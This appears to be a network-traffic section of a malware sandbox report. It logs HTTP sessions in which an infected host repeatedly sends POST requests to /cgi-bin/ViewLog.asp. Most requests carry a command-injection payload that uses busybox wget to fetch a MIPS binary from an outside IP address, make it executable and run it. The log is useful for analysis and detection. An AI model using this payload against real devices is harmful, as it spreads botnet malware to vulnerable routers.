                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              545192.168.2.143864494.183.152.308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.796066999 CET445INHTTP/1.1 400 Bad Request
                                              Server: micro_httpd
                                              Cache-Control: no-cache
                                              Date: Thu, 22 Jan 1970 17:04:58 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              546192.168.2.145089895.183.67.2058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.358308077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.545917988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.921890974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.141891003 CET378INHTTP/1.1 404 Not Found
                                              Server: nginx/1.14.0
                                              Date: Thu, 23 Nov 2023 04:17:54 GMT
                                              Content-Type: text/html
                                              Content-Length: 169
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              547192.168.2.145286494.120.100.1548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.358378887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.545936108 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.953974009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.993756056 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.625504017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.889035940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              548192.168.2.144347294.120.216.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.358920097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.545945883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.953972101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.993757010 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.625494957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.889045954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              549192.168.2.143760062.56.221.968080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.368132114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.098071098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.569972992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              550192.168.2.143789294.122.71.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.596395969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              551192.168.2.145401431.136.65.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.769390106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.353926897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.505882978 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.969861031 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.577590942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
